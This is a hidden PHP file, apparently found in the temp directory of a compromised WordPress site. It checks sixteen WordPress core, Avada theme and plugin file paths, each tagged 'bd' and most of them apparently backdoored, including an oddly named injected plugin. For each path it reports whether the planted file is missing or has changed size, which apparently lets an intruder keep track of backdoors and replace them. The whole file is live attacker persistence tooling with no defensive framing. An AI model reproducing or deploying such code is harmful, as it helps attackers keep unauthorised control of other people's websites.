File: //tmp/.property_set
<?php $r = '/home/corofmbe/public_html'; $x = ["/wp-includes/canonical.php"=>"bd@@1292850@@49",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/colorrgba/validation.colorrgba.php"=>"bd@@1290552@@851",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/color_gradient/field.color.gradient.php"=>"bd@@1290413@@968",
"/wp-content/themes/Avada/woocommerce/compatibility/3.2/single-product/tabs/additional.information.php"=>"bd@@1290694@@1016",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/raw/parsedown.raw.php"=>"bd@@1290467@@894",
"/wp-includes/Text/Diff/Renderer/inline.php"=>"bd@@1292955@@96",
"/wp-includes/bookmark.php"=>"bd@@1293000@@93",
"/wp-content/plugins/script-b7296d2c-b7296d2c/script-b7296d2c-b7296d2c.php"=>"bd@@1293103@@33",
"/wp-includes/customize/class-wp-customize-partial.php"=>"bd@@1293172@@23",
"/wp-includes/html-api/class-wp-html-attribute-token.php"=>"bd@@1293282@@1",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/slides/field.slides.php"=>"bd@@1293371@@1043",
"/wp-content/plugins/fusion-builder/inc/lib/inc/redux/framework/FusionReduxCore/inc/validation/color/validation.color.php"=>"bd@@1293439@@920",
"/wp-content/themes/Avada/includes/lib/inc/redux/custom-fields/color_alpha/field.color.alpha.php"=>"bd@@1293541@@813",
"/wp-content/plugins/wordpress-seo/vendor/ruckusing/ruckusing-migrations/lib/Task/Hello/ThreeWay.php"=>"bd@@1293559@@915",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/no_html/validation.no.html.php"=>"bd@@1290510@@939",
"/wp-content/plugins/fusion-builder/inc/lib/inc/redux/custom-fields/ace_editor/field.ace.editor.php"=>"bd@@1293596@@1007"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');